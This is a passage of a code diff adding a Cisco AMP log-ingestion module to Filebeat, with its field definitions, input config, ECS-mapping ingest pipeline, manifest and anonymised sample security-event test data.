threat_hunting.incident_report_guid + type: keyword + description: > + The GUID of the related threat hunting report. + + - name: threat_hunting.incident_hunt_guid + type: keyword + description: > + The GUID of the related investigation tracking issue. + + - name: threat_hunting.incident_title + type: keyword + description: > + Title of the incident related to the threat hunting activity. + + - name: threat_hunting.incident_summary + type: keyword + description: > + Summary of the outcome on the threat hunting activity. + + - name: threat_hunting.incident_remediation + type: keyword + description: > + Recommendations to resolve the vulnerability or exploited host. + + - name: threat_hunting.incident_id + type: keyword + description: > + The id of the related incident for the threat hunting activity. + + - name: threat_hunting.incident_end_time + type: date + description: > + When the threat hunt finalized or closed. + + - name: threat_hunting.incident_start_time + type: date + description: > + When the threat hunt was initiated. + + - name: file.attack_details.indicators + type: flattened + description: > + Different indicator types that matches the exploit detected, for example different MITRE tactics. + + - name: threat_hunting.tactics + type: flattened + description: > + List of all MITRE tactics related to the incident found. + + - name: threat_hunting.techniques + type: flattened + description: > + List of all MITRE techniques related to the incident found. + + - name: tactics + type: flattened + description: > + List of all MITRE tactics related to the incident found. + + - name: techniques + type: flattened + description: > + List of all MITRE techniques related to the incident found. \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/config/config.yml b/x-pack/filebeat/module/cisco/amp/config/config.yml new file mode 100644 index 000000000000..8e4695d7458b --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/config/config.yml @@ -0,0 +1,77 @@ +{{ if eq .input "httpjson" }} + +type: httpjson +config_version: "2" +interval: {{ .interval }} + +{{ if .client_id }} +auth.basic.user: {{ .client_id }} +{{ end }} +{{ if .api_key }} +auth.basic.password: {{ .api_key }} +{{ end }} + +request.url: {{ .url }} +request.method: GET +request.timeout: {{ .request_timeout }} +{{ if .ssl }} +request.ssl: {{ .ssl | tojson }} +{{ end }} +request.transforms: +- set: + target: url.params.start_date + value: '[[.cursor.timestamp]]' + default: '[[ formatDate (now (parseDuration "-{{ .first_interval }}")) "2006-01-02T15:04:05-07:00" ]]' +- set: + target: url.params.limit + value: {{ .limit }} +request.rate_limit.limit: '[[ .last_response.header.Get "X-RateLimit-Limit" ]]' +request.rate_limit.reset: '[[ .last_response.header.Get "X-RateLimit-Reset" ]]' +request.rate_limit.remaining: '[[ .last_response.header.Get "X-RateLimit-Remaining" ]]' + +response.split: + target: body.data + keep_parent: true + +response.pagination: +- set: + target: url.value + value: '[[ .last_response.body.metadata.links.next ]]' + +cursor: + timestamp: + value: '[[ .first_event.data.date ]]' + +{{ else if eq .input "file" }} + +type: log +paths: +{{ range $i, $path := .paths }} + - {{$path}} +{{ end }} +exclude_files: [".gz$"] + +{{ end }} + + +tags: {{.tags | tojson}} +publisher_pipeline.disable_host: {{ inList .tags "forwarded" }} + +processors: + - decode_json_fields: + fields: [message] + target: json + - if: + has_fields: ["json.data.id"] + then: + - fingerprint: + fields: ["json.data.id"] + target_field: "@metadata._id" + else: + - fingerprint: + fields: ["json.data.timestamp", "json.data.event_type_id", "json.data.connector_guid"] + target_field: "@metadata._id" + - add_fields: + target: '' + fields: + ecs.version: 1.7.0 diff --git a/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml new file mode 100644 index 000000000000..b77c3be1f9cd --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/ingest/pipeline.yml @@ -0,0 +1,434 @@ +description: Pipeline for parsing Cisco AMP logs +processors: + +- remove: + field: + - message + ignore_missing: true +######################### +## ECS General Mapping ## +######################### +- rename: + field: json.data + target_field: cisco.amp + ignore_missing: true +- remove: + field: + - "@timestamp" + ignore_missing: true + if: ctx?.cisco?.amp?.timestamp != null +- date: + field: cisco.amp.timestamp + formats: + - UNIX + ignore_failure: true + +####################### +## ECS Event Mapping ## +####################### +- set: + field: event.ingested + value: '{{_ingest.timestamp}}' +- set: + field: event.kind + value: alert +- rename: + field: cisco.amp.id + target_field: event.id + ignore_missing: true +- append: + field: event.category + value: file + if: ctx?.cisco?.amp?.file?.file_name != null +- append: + field: event.category + value: malware + if: 'ctx?.cisco?.amp?.file?.disposition == "Malicious"' +- rename: + field: cisco.amp.event_type + target_field: event.action + ignore_missing: true +- set: + field: event.severity + value: 1 + if: ctx?.cisco?.amp?.severity == 'Low' +- set: + field: event.severity + value: 2 + if: ctx?.cisco?.amp?.severity == 'Medium' +- set: + field: event.severity + value: 3 + if: ctx?.cisco?.amp?.severity == 'High' +- set: + field: event.severity + value: 4 + if: ctx?.cisco?.amp?.severity == 'Critical' +- set: + field: event.severity + value: 0 + if: ctx?.cisco?.amp?.severity == null +- date: + field: cisco.amp.start_timestamp + target_field: event.start + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.start_timestamp != null + +###################### +## ECS Host Mapping ## +###################### +- rename: + field: cisco.amp.computer.hostname + target_field: host.name + ignore_missing: true +- set: + field: host.hostname + value: "{{ host.name }}" + if: ctx?.host?.name != null +- rename: + field: cisco.amp.computer.user + target_field: host.user.name + ignore_missing: true + +######################### +## ECS Network Mapping ## +######################### +- rename: + field: cisco.amp.network_info.nfm.protocol + target_field: network.transport + ignore_missing: true +- set: + field: network.direction + value: egress + if: "ctx?.cisco?.amp?.network_info?.nfm?.direction == 'Outgoing connection from'" +- set: + field: network.direction + value: ingress + if: "ctx?.cisco?.amp?.network_info?.nfm?.direction != null && ctx?.cisco?.amp?.network_info?.nfm?.direction != 'Outgoing connection from'" + +##################### +## ECS URL Mapping ## +##################### +- uri_parts: + field: cisco.amp.network_info.dirty_url + target_field: url + keep_original: true + remove_if_successful: true + if: ctx?.cisco?.amp?.network_info?.dirty_url != null +- rename: + field: cisco.amp.network_info.dirty_url + target_field: url.original + ignore_missing: true + +######################## +## ECS Source Mapping ## +######################## +- rename: + field: cisco.amp.network_info.local_ip + target_field: source.ip + ignore_missing: true +- rename: + field: cisco.amp.network_info.local_port + target_field: source.port + ignore_missing: true + +############################# +## ECS Destination Mapping ## +############################# +- rename: + field: cisco.amp.network_info.remote_ip + target_field: destination.ip + ignore_missing: true +- rename: + field: cisco.amp.network_info.remote_port + target_field: destination.port + ignore_missing: true + +###################### +## ECS File Mapping ## +###################### +- rename: + field: cisco.amp.file.file_name + target_field: file.name + ignore_missing: true +- rename: + field: cisco.amp.file.file_path + target_field: file.path + ignore_missing: true +- rename: + field: cisco.amp.file.identity.sha256 + target_field: file.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.file.identity.sha1 + target_field: file.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.file.identity.md5 + target_field: file.hash.md5 + ignore_missing: true + +##################### +## ECS OS Mapping ## +##################### +- set: + field: host.os.family + value: windows + if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")' +- set: + field: host.os.platform + value: windows + if: 'ctx?.file?.path != null && ctx?.file?.path.contains("\\\\")' + +######################### +## ECS Process Mapping ## +######################### +- rename: + field: cisco.amp.file.parent.process_id + target_field: process.pid + ignore_missing: true +- rename: + field: cisco.amp.file.parent.file_name + target_field: process.name + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.sha256 + target_field: process.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.sha1 + target_field: process.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.file.parent.identity.md5 + target_field: process.hash.md5 + ignore_missing: true + +- rename: + field: cisco.amp.network_info.parent.process_id + target_field: process.pid + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.file_name + target_field: process.name + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.sha256 + target_field: process.hash.sha256 + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.sha1 + target_field: process.hash.sha1 + ignore_missing: true +- rename: + field: cisco.amp.network_info.parent.identity.md5 + target_field: process.hash.md5 + ignore_missing: true + +######################### +## ECS Related Mapping ## +######################### +- append: + field: related.user + value: "{{ host.user.name }}" + if: ctx?.host?.user?.name != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.sha256 }}" + if: ctx?.process?.parent?.hash?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.md5 }}" + if: ctx?.process?.parent?.hash?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ process.hash.sha1 }}" + if: ctx?.process?.parent?.hash?.sha1 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.sha256 }}" + if: ctx?.file?.hash?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.md5 }}" + if: ctx?.file?.hash?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ file.hash.sha1 }}" + if: ctx?.file?.hash?.sha1 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.sha256 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha256 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.md5 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.md5 != null + allow_duplicates: false +- append: + field: related.hash + value: "{{ cisco.amp.network_info.parent.identity.sha1 }}" + if: ctx?.cisco?.amp?.network_info?.parent?.identity?.sha1 != null + allow_duplicates: false +- append: + field: related.hosts + value: "{{ host.name }}" + if: ctx?.host?.name != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ source.ip }}" + if: ctx?.source?.ip != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ destination.ip }}" + if: ctx?.destination?.ip != null + allow_duplicates: false +- append: + field: related.ip + value: "{{ cisco.amp.computer.external_ip }}" + if: ctx?.cisco?.amp?.computer?.external_ip != null + allow_duplicates: false +- foreach: + field: cisco.amp.computer.network_addresses + processor: + append: + field: related.ip + value: "{{ _ingest._value.ip }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.computer?.network_addresses != null +- foreach: + field: cisco.amp.computer.network_addresses + processor: + append: + field: cisco.amp.related.mac + value: "{{ _ingest._value.mac }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.computer?.network_addresses != null +- foreach: + field: cisco.amp.vulnerabilities + processor: + append: + field: cisco.amp.related.cve + value: "{{ _ingest._value.cve }}" + allow_duplicates: false + if: ctx?.cisco?.amp?.vulnerabilities != null + +############# +## GeoIP ## +############# +- geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + if: "ctx.source?.geo == null" +- geoip: + field: destination.ip + target_field: destination.geo + ignore_missing: true + if: "ctx.destination?.geo == null" +- geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true +- geoip: + database_file: GeoLite2-ASN.mmdb + field: destination.ip + target_field: destination.as + properties: + - asn + - organization_name + ignore_missing: true +- rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true +- rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true +- rename: + field: destination.as.asn + target_field: destination.as.number + ignore_missing: true +- rename: + field: destination.as.organization_name + target_field: destination.as.organization.name + ignore_missing: true + +############# +## Cleanup ## +############# +- date: + field: cisco.amp.threat_hunting.incident_start_time + target_field: cisco.amp.threat_hunting.incident_start_time + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.threat_hunting?.incident_start_time != null +- date: + field: cisco.amp.threat_hunting.incident_end_time + target_field: cisco.amp.threat_hunting.incident_end_time + formats: + - UNIX + ignore_failure: true + if: ctx?.cisco?.amp?.threat_hunting?.incident_end_time != null + + +- script: + lang: painless + description: This script processor iterates over the whole document to remove fields with null values. + if: ctx?.json != null + source: | + void handleMap(Map map) { + for (def x : map.values()) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + map.values().removeIf(v -> v == null); + } + void handleList(List list) { + for (def x : list) { + if (x instanceof Map) { + handleMap(x); + } else if (x instanceof List) { + handleList(x); + } + } + } + handleMap(ctx); + +- remove: + field: + - cisco.amp.timestamp + - cisco.amp.computer.links + - json + - cisco.amp.severity + - cisco.amp.start_timestamp + - cisco.amp.date + - cisco.amp.start_timestamp_nanoseconds + - cisco.amp.start_date + ignore_missing: true +on_failure: +- set: + field: error.message + value: '{{ _ingest.on_failure_message }}' + diff --git a/x-pack/filebeat/module/cisco/amp/manifest.yml b/x-pack/filebeat/module/cisco/amp/manifest.yml new file mode 100644 index 000000000000..9458f80a17df --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/manifest.yml @@ -0,0 +1,24 @@ +module_version: 1.0 + +var: + - name: input + default: httpjson + - name: url + default: https://api.amp.cisco.com/v1/events?offset=0&limit=300 + - name: tags + default: [cisco-amp, forwarded] + - name: ssl + - name: request_timeout + default: 60s + - name: limit + default: 100 + - name: client_id + - name: api_key + - name: first_interval + default: 24h + - name: interval + default: 60m + +ingest_pipeline: + - ingest/pipeline.yml +input: config/config.yml diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log new file mode 100644 index 000000000000..14599ecfc0cc --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp.ndjson.log @@ -0,0 +1,8 @@ +{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":153000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.Trojan.22gp.1201","detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"user@domain","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:ac:af:1d:ad"},{"ip":"192.168.120.1","mac":"12:24:56:c2:00:01"},{"ip":"192.168.160.1","mac":"12:50:56:c2:53:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","file_name":"HYXiN3hY.exe.part","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\HYXiN3hY.exe.part","identity":{"sha256":"e678899d7ea9702184067b56655f91b69f8a0bdc9df65613762252c055c2cdvc","sha1":"d0c4192b65e36553fvfd2b83f3113f6ae8390baa","md5":"9a8557b98ed1469272fa0ace91d63477"},"parent":{"process_id":88,"disposition":"Unknown","file_name":"firefox.exe","identity":{"sha256":"a7ca534327103ec5fac749f5ab8b7a1fe81209aa580a52df656284ef6215f0ab","sha1":"d539afb0991e823c7cdf824b610a5a5d7655a2da","md5":"e50ab86d5409d4d0ad386b27ea7f78fb"}}}}} +{"data":{"id":123578990,"timestamp":1605088298,"timestamp_nanoseconds":163000000,"date":"2020-11-11T09:51:38+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.196.22","mac":"aa:d9:bb:af:22:fd"},{"ip":"192.168.120.1","mac":"00:52:12:c0:11:01"},{"ip":"192.168.160.1","mac":"01:51:56:c0:c2:08"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543","trajectory":"https://api.eu.amp.cisco.com/v1/computers/e2313e43-44a5-sdgfd-8708-123543/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/12354373906b43b5347"}},"file":{"disposition":"Malicious","identity":{"sha256":"e678899d7ea9702184167b56655f91a69f8a0bdc9df65612762252c053c2cd7c"}}}} +{"data":{"id":123578990,"timestamp":1605085728,"timestamp_nanoseconds":183000000,"date":"2020-11-11T09:08:48+00:00","event_type":"Exploit Prevention","event_type_id":1090519103,"detection_id":"12365423467","connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","user":"uuser@domain","active":true,"network_addresses":[{"ip":"192.1.1.1","mac":"av:1d:13:a2:21:1f"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235","trajectory":"https://api.eu.amp.cisco.com/v1/computers/cad0e0c8-asdf5234-42346-82aa-1235/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe","identity":{"sha256":"2262a4766bc394b4cb2d658144b207183ff23a3039121cd74e615ab64e6e57d6","sha1":"22643e8613bb0dd90888b17367007489fe16693e4","md5":"bcc2a6493e0641bb1e60cbf640169e579"},"parent":{"process_id":7328,"disposition":"Unknown","file_name":"OfficeSetup.exe","identity":{"sha256":"a6d1aa0df1c23eb8b7563245082ed2eddf00e3da62cbeb41ac701123vasce927f465d","sha1":"90d3a389307ag2a7fbv8726502077b69ab0fd79a0","md5":"6a262b4af012ec81ffeb36f5faf70311"}},"attack_details":{"application":"powershell.exe","attacked_module":"Script Control:System.Management.Automation.dll","base_address":"0x000F0000","suspicious_files":[""],"indicators":[{"MITRE_Tactic":[{"tactic_id":"TA0002","name":"Execution"}],"severity":"medium","description":"A PowerShell command with a very long command line argument that may indicate an obfuscated script has been detected. PowerShell is an extensible Windows scripting language present on all versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell based threats.","short_description":"Excessively long PowerShell command detected","id":123578990,"MITRE_Technique":[{"tehcnique_id":"T1086","name":"PowerShell","technique_id":"T1086"}]}]}}}} +{"data":{"id":123578990,"timestamp":1605084750,"timestamp_nanoseconds":736000000,"date":"2020-11-11T08:52:30+00:00","event_type":"File Fetch Failed","event_type_id":2164260910,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"error":{"error_code":3240099848,"description":"File not found"},"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.184","mac":"av:6b:fc:23:a1:29"},{"ip":"192.168.2.1","mac":"00:50:24:c0:01:01"},{"ip":"192.168.12.1","mac":"55:50:22:c0:12:11"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd","trajectory":"https://api.eu.amp.cisco.com/v1/computers/11ac0afb-123456-45b5-84bc-543asbvdcasd/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/0c246ccd-45123214-4d30-900f-12454354354423"}},"file":{"disposition":"Unknown","file_name":"setup.exe","file_path":"\\\\?\\C:\\Users\\elastic\\AppData\\Local\\Temp\\somezip.zip\\Visual_install\\setup.exe","identity":{"sha256":"a8b424b65d1550c87b531f7a14523bvdf982d8f869976f99fa1cef5342ausdy"}}}} +{"data":{"id":123578990,"timestamp":1605079734,"timestamp_nanoseconds":24000000,"date":"2020-11-11T07:28:54+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Medium","start_timestamp":1605079733,"start_date":"2020-11-11T07:28:53+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.2","mac":"ac:aa:22:00:11:55"},{"ip":"192.168.228.70","mac":"f2:18:12:75:55:12"},{"ip":"192.12.52.12","mac":"65:29:8f:97:04:ea"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-1235213","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1224532-sadf-dsf2134-bb5b-123512/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"cloud_ioc":{"description":"A process was seen whitelisting/restoring a file from quarantine. This is an uncommon task, and warrants further investigation as OS X is not known to quarantine files unnecessarily. This is also known to be part of the Mitre Att&ck Framework, technique T1144.","short_description":"OSX.QuarantineExclusion.ioc"},"file":{"disposition":"Clean","file_name":"sudo","file_path":"file:///usr/bin/sudo","identity":{"sha256":"123dfsdg234b7ba3d5ff63033129fa1b96975ad124sdgasdf1sdf"},"parent":{"disposition":"Clean","identity":{"sha256":"sadgf234643sdaffee7a9bd309a4123sdfag9523e8b152123sdfgdfsf2"}}},"command_line":{"arguments":"sudo /usr/bin/xattr -r -d com.apple.quarantine uTorrent.app"},"tactics":["TA0005"],"techniques":["T1144"]}} +{"data":{"id":123578990,"timestamp":1605079353,"timestamp_nanoseconds":170000000,"date":"2020-11-11T07:22:33+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.1.2","mac":"11:50:f1:12:23:23"},{"ip":"192.168.1.1","mac":"0a:12:27:52:00:12"},{"ip":"192.168.2.1","mac":"00:c1:12:c0:22:12"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/1234d-sadf-234-sdf-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/123543-sdgfdf234-sadf13-123"}},"file":{"disposition":"Unknown","file_name":"locale.exe","file_path":"\\\\?\\C:\\tools\\msys64\\usr\\bin\\locale.exe","identity":{"sha256":"asdf123sdfaac359fcb0d488ca489e2d55645ce34709fdafb78e336405cb","sha1":"asdfsadf1234140de34a45db0124e5c518bf612","md5":"asdgsdrf2346523279149285c8ddc8"}}}} +{"data":{"id":123578990,"timestamp":1605079316,"timestamp_nanoseconds":611596000,"date":"2020-11-11T07:21:56+00:00","event_type":"File Fetch Completed","event_type_id":553648173,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.1","mac":"f2:18:12:23:c5:54"},{"ip":"","mac":"82:2a:e3:12:58:02"},{"ip":"","mac":"vg:de:12:00:v1:22"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123","trajectory":"https://api.eu.amp.cisco.com/v1/computers/634532-sdf-234-dsfga-123/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/64535234-123dfsg-3245sdf-123"}},"file":{"disposition":"Clean","file_name":"sudo","file_path":"/usr/bin/sudo","identity":{"sha256":"123asfdsdfa125ff63033129fa1b96975ad4d6da2e2a4cf6393"}}}} +{"data":{"id":123578990,"timestamp":1605030133,"timestamp_nanoseconds":0,"date":"2020-11-10T17:42:13+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"1235-1234sdgf-654sdf-7562345","group_guids":["6542345gdfs-234-sdf2-34-6345243"],"severity":"Low","start_timestamp":1605030131,"start_date":"2020-11-10T17:42:11+00:00","computer":{"connector_guid":"1235-1234sdgf-654sdf-7562345","hostname":"testhost","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"192.168.2.42","mac":"av:17:1b:fe:v2:f0"},{"ip":"192.168.1.1","mac":"00:42:v2:3c:12:12"},{"ip":"192.168.6.1","mac":"1f:12:27:00:00:52"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/124324df-2123-523-41231","trajectory":"https://api.eu.amp.cisco.com/v1/computers/124324df123-523-41231/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/1235643-sdf123123"}},"file":{"disposition":"Clean","file_name":"AcroRd32.exe","identity":{"sha256":"5643234fsadgef6644b8b69e999c454c045a2d8ec476c4b6165df4ed03"},"parent":{"disposition":"Clean","identity":{"sha256":"agdfsdaf987sdf036070cca561bff5337c472313c0cb4ad"}}},"vulnerabilities":[{"name":"Adobe Acrobat Reader","version":"15.007.20033","cve":"CVE-2014-0566","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0566"},{"cve":"CVE-2015-3095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-3095"},{"cve":"CVE-2015-4435","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4435"},{"cve":"CVE-2015-4438","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4438"},{"cve":"CVE-2015-4441","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4441"},{"cve":"CVE-2015-4445","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4445"},{"cve":"CVE-2015-4446","score":"7.5","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4446"},{"cve":"CVE-2015-4447","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4447"},{"cve":"CVE-2015-4448","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4448"},{"cve":"CVE-2015-4451","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4451"},{"cve":"CVE-2015-4452","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-4452"},{"cve":"CVE-2015-5085","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5085"},{"cve":"CVE-2015-5086","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5086"},{"cve":"CVE-2015-5087","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5087"},{"cve":"CVE-2015-5090","score":"7.2","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5090"},{"cve":"CVE-2015-5091","score":"7.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5091"},{"cve":"CVE-2015-5093","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5093"},{"cve":"CVE-2015-5094","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5094"},{"cve":"CVE-2015-5095","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5095"},{"cve":"CVE-2015-5096","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5096"},{"cve":"CVE-2015-5097","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5097"},{"cve":"CVE-2015-5098","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5098"},{"cve":"CVE-2015-5099","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5099"},{"cve":"CVE-2015-5100","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5100"},{"cve":"CVE-2015-5101","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5101"},{"cve":"CVE-2015-5102","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5102"},{"cve":"CVE-2015-5103","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5103"},{"cve":"CVE-2015-5104","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5104"},{"cve":"CVE-2015-5105","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5105"},{"cve":"CVE-2015-5106","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5106"},{"cve":"CVE-2015-5108","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5108"},{"cve":"CVE-2015-5109","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5109"},{"cve":"CVE-2015-5110","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5110"},{"cve":"CVE-2015-5111","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5111"},{"cve":"CVE-2015-5113","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5113"},{"cve":"CVE-2015-5114","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5114"},{"cve":"CVE-2015-5115","score":"10.0","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-5115"},{"cve":"CVE-2017-11211","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11211"},{"cve":"CVE-2017-11212","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11212"},{"cve":"CVE-2017-11214","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11214"},{"cve":"CVE-2